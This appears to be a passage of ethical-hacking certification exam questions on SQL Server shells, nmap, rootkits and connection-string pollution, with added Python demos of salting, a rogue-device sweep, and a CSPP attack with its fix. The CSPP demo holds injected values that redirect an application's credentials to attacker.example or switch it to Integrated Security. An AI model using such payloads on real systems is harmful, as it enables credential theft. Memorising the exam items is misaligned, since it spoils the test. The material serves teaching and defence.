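Salting works because a precomputed table is only useful against digests computed exactly the way the table was built; a per-user random salt forces the attacker to redo the whole precomputation for every account. The example below is added here and is not part of the exam material. It uses a plain digest-to-password lookup table built over a constructed wordlist in place of a true rainbow table (a rainbow table compresses the same precomputation with hash/reduce chains, but the reason salting defeats it is identical), shows the unsalted hash being recovered instantly, then shows that a salted PBKDF2 digest of the same password is not in the table. The iteration count and the hex "salt$hash" storage layout are assumptions of this demo.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional, Sequence

# Constructed candidate list standing in for a cracking wordlist.
WORDLIST = ["123456", "password", "letmein", "password123", "qwerty", "Winter2024!"]

KDF_ITERATIONS = 100_000  # assumed PBKDF2 work factor for this demo


def unsalted_hash(password: str) -> str:
    """What a weak scheme stores: a bare digest that depends only on the password,
    so every user with this password has the same stored value."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(candidates: Sequence[str]) -> Dict[str, str]:
    """Precompute digest -> password over the wordlist once; reuse it against
    every stolen hash. This is the precomputation a rainbow table compresses."""
    return {unsalted_hash(p): p for p in candidates}


def crack(digest: str, table: Dict[str, str]) -> Optional[str]:
    """Attack time is a single lookup: no hashing at all."""
    return table.get(digest)


def salted_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Store a random 16-byte salt next to PBKDF2-HMAC-SHA256(password, salt)
    as 'salt$hash' in hex. The salt is public; it only has to be unique."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ITERATIONS)
    return f"{salt.hex()}${dk.hex()}"


def verify_salted(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, dk_hex = stored.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), KDF_ITERATIONS)
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print(crack(unsalted_hash("password123"), table))      # recovered instantly
    stored = salted_hash("password123")
    print(crack(stored.split("$", 1)[1], table))           # None: table lacks this salt
    print(verify_salted("password123", stored), verify_salted("letmein", stored))
```

Two properties are doing the work: the salt makes the precomputation per-account instead of global, and the iterated KDF makes each guess cost roughly 100,000 hashes instead of one. Options B and C only change which wordlist the attacker precomputes; option D limits online guessing but does nothing for a stolen hash database.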

Question 100

During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The tester assumes that the service is running under the Local System account. How can this weakness be exploited to access the system?

Options:

A.

Using the Metasploit psexec module setting the SA / Admin credential

B.

Invoking the stored procedure xp_shell to spawn a Windows command shell

C.

Invoking the stored procedure cmd_shell to spawn a Windows command shell

D.

Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

Question 101

At a Windows Server command prompt, which command could be used to list the running services?

Options:

A.

Sc query type= running

B.

Sc query \\servername

C.

Sc query

D.

Sc config

Question 102

A security policy will be more accepted by employees if it is consistent and has the support of

Options:

A.

coworkers.

B.

executive management.

C.

the security officer.

D.

a supervisor.

Question 103

Which of the following lists are valid data-gathering activities associated with a risk assessment?

Options:

A.

Threat identification, vulnerability identification, control analysis

B.

Threat identification, response identification, mitigation identification

C.

Attack profile, defense profile, loss profile

D.

System profile, vulnerability identification, security determination

Question 104

How can a rootkit bypass the Windows 7 operating system’s kernel-mode code signing policy?

Options:

A.

Defeating the scanner from detecting any code change at the kernel

B.

Replacing patch system calls with its own version that hides the rootkit (attacker's) actions

C.

Performing common services for the application process and replacing real applications with fake ones

D.

Attaching itself to the master boot record in a hard drive and changing the machine's boot sequence/options

Question 105

Which of the following is a symmetric cryptographic standard?

Options:

A.

DSA

B.

PKI

C.

RSA

D.

3DES

Question 106

Which tool is used to automate SQL injections and exploit a database by forcing a given web application to connect to another database controlled by a hacker?

Options:

A.

DataThief

B.

NetCat

C.

Cain and Abel

D.

SQLInjector

Question 107

What results will the following command yield: 'NMAP -sS -O -p 123-153 192.168.100.3'?

Options:

A.

A stealth scan, opening port 123 and 153

B.

A stealth scan, checking open ports 123 to 153

C.

A stealth scan, checking all open ports excluding ports 123 to 153

D.

A stealth scan, determine operating system, and scanning ports 123 to 153

Question 108

A hacker is attempting to see which ports have been left open on a network. Which NMAP switch would the hacker use?

Options:

A.

-sO

B.

-sP

C.

-sS

D.

-sU

Question 109

A recently hired network security associate at a local bank was given the responsibility to perform daily scans of the internal network to look for unauthorized devices. The employee decides to write a script that will scan the network for unauthorized devices every morning at 5:00 am.

Which of the following programming languages would most likely be used?

Options:

A.

PHP

B.

C#

C.

Python

D.

ASP.NET
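The scenario in this question is a discovery sweep (nmap -sn, the same ping scan asked about in Question 73) whose results are compared against an asset inventory. The following script is an added example, not part of the exam material: it runs nmap with XML output on stdout, parses the live hosts, and reports any whose MAC address is not on an assumed allowlist. The sample XML embedded below is constructed and trimmed to the elements the parser reads, so the script runs offline; the scan itself is only invoked when the script is executed as a program against a real target. Two caveats a practitioner should keep in mind: nmap only learns MAC addresses when it scans from the same layer 2 segment (ARP), so across a router the field is absent, and MAC addresses are trivially spoofed, so this is an inventory check, not a security boundary.

```python
import subprocess
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample of `nmap -sn -oX -` output, reduced to the elements used below.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sn -oX - 192.168.11.0/24">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.11.1" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:01" addrtype="mac" vendor="ExampleVendor"/>
  </host>
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.11.57" addrtype="ipv4"/>
    <address addr="aa:bb:cc:dd:ee:57" addrtype="mac"/>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.11.58" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Assumed inventory (MAC -> asset name); in practice load it from the CMDB.
AUTHORIZED_MACS: Dict[str, str] = {"00:11:22:33:44:01": "core-switch"}


def run_ping_sweep(target: str) -> str:
    """Run the discovery scan and return nmap's XML report (-oX - writes to stdout).
    Needs nmap installed and, for MAC addresses, a host on the target segment."""
    result = subprocess.run(["nmap", "-sn", "-oX", "-", target],
                            capture_output=True, text=True, check=True)
    return result.stdout


def parse_live_hosts(xml_text: str) -> List[Dict[str, str]]:
    """Return [{'ip': ..., 'mac': ...}] for every host nmap reports as up.
    The mac field is '' when nmap could not observe one (remote segment)."""
    hosts: List[Dict[str, str]] = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addrs = {a.get("addrtype"): a.get("addr", "") for a in host.findall("address")}
        hosts.append({"ip": addrs.get("ipv4", ""), "mac": addrs.get("mac", "").upper()})
    return hosts


def find_unauthorized(hosts: List[Dict[str, str]], allowlist: Dict[str, str]) -> List[Dict[str, str]]:
    """Hosts whose MAC is not in the inventory, including hosts with no MAC at all,
    which should be investigated rather than silently accepted."""
    return [h for h in hosts if h["mac"] not in allowlist]


if __name__ == "__main__":
    # With a target argument do a real sweep; otherwise demonstrate on the sample.
    xml_text = run_ping_sweep(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_NMAP_XML
    rogue = find_unauthorized(parse_live_hosts(xml_text), AUTHORIZED_MACS)
    for h in rogue:
        print(f"UNAUTHORIZED {h['ip']} mac={h['mac'] or 'unknown'}")
    sys.exit(1 if rogue else 0)
```

To run it at 05:00 daily as the question describes, a cron entry such as `0 5 * * * /usr/bin/python3 /opt/sweep/sweep.py 192.168.11.0/24` (path assumed) is enough; the non-zero exit status on findings lets the scheduler or a wrapper raise an alert.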

Question 110

What technique is used to perform a Connection Stream Parameter Pollution (CSPP) attack?

Options:

A.

Injecting parameters into a connection string using semicolons as a separator

B.

Inserting malicious Javascript code into input parameters

C.

Setting a user's session identifier (SID) to an explicit known value

D.

Adding multiple parameters with the same name in HTTP requests
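Option A is the CSPP technique: when an application concatenates user input into a "key=value;key=value" connection string, a value containing a semicolon smuggles extra keys in, and a driver that honours the last occurrence of a repeated key (the documented behaviour of ADO.NET SqlClient, for instance) lets the attacker override trusted settings such as Data Source or Integrated Security. The example below is added here and is not part of the exam material. It contains a deliberately minimal connection-string parser whose last-wins precedence is an assumption of the demo, a vulnerable builder, a constructed attacker payload that redirects the connection to an attacker host (sending the application's credentials there), and a hardened builder that rejects delimiter characters. The robust fix in a real code base is the driver's own builder class, which quotes values; delimiter rejection is the portable fallback shown here.

```python
import re
from typing import Dict

# Characters that can change the meaning of a key=value;... string.
DELIMITERS = set(';="\'')


def parse_connection_string(conn: str) -> Dict[str, str]:
    """Minimal parser for 'Key=Value;Key=Value;' strings, keys case-insensitive.
    Demo assumption: a repeated key takes its LAST occurrence, the precedence
    CSPP relies on. Check your driver's documentation for its actual rule."""
    params: Dict[str, str] = {}
    for part in conn.split(";"):
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        params[key.strip().lower()] = value.strip()
    return params


def build_vulnerable(server: str, user: str, password: str) -> str:
    """Untrusted input is concatenated straight into the string."""
    return f"Data Source={server};User Id={user};Password={password};"


def is_safe_value(value: str) -> bool:
    """True when the value cannot introduce or terminate a parameter."""
    return not any(ch in DELIMITERS for ch in value)


def build_hardened(server: str, user: str, password: str) -> str:
    """Same string, but user-controlled fields are refused if they carry delimiters."""
    for name, value in (("user", user), ("password", password)):
        if not is_safe_value(value):
            raise ValueError(f"illegal character in {name}")
    return f"Data Source={server};User Id={user};Password={password};"


# Constructed attacker input: the trailing key overrides the trusted server.
MALICIOUS_USER = "alice;Data Source=attacker.example"


if __name__ == "__main__":
    polluted = build_vulnerable("db.internal", MALICIOUS_USER, "s3cret")
    print(polluted)
    print(parse_connection_string(polluted)["data source"])  # attacker.example
    try:
        build_hardened("db.internal", MALICIOUS_USER, "s3cret")
    except ValueError as exc:
        print("rejected:", exc)
```

The payload is effective even though the attacker only controls the user field: the driver sees two Data Source entries and keeps the attacker's, so the application authenticates to attacker.example with its real password. A second common payload, `alice;Integrated Security=true`, makes the driver switch to the service account's Windows credentials instead of the supplied password.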
